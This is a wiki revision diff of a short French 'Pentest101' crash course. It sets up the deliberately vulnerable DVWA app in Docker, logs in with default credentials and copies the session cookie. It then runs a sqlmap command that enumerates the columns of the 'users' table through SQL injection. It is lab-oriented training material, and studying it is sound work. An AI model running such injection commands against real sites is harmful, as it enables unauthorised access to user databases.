Difference between revisions of "Pentest101"

From Tmplab
(Crash course)
 
Line 5: Line 5:
 
* <code>Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa</code>
 
* <code>Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa</code>
 
* <code>docker run --rm -it -p 80:80 albancrommer/dvwa</code>
 
* <code>docker run --rm -it -p 80:80 albancrommer/dvwa</code>
* <code>browser http://localhost</code>
+
* <code>x-www-browser http://localhost</code>
 
* <code>Se logger comme admin:password</code>
 
* <code>Se logger comme admin:password</code>
 
* <code>F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)</code>
 
* <code>F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)</code>

Latest revision as of 22:54, 24 September 2020

Crash course


On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?

sqlmap -u "http://dvwa.lab.local/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=$SESSIONCOOKIE;security=low" -D dvwa -T users --columns